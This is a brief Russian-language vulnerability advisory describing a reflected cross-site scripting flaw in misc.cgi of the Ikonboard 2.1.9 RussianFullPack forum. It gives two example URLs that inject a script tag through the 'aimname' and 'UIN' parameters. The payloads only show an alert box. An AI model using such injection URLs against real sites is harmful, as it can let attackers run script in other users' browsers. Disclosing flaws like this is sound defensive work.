Программа: Ikonboard 2.1.9 RussianFullPack 

Уязвимость найдена в скрипте misc.cgi в форуме Ikonboard 2.1.9 RussianFullPack в полях "aimname" и "UIN". Удаленный пользователь может выполнить XSS нападение. 

Пример: 

http://target/cgi-bin/ikonboard/misc.cgi?action= aim&aimname=<script>javascript:
alert('hello')</script>
http://target/cgi-bin/ikonboard/misc.cgi?action= icq&UIN=<script>javascript:
alert('hello')</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии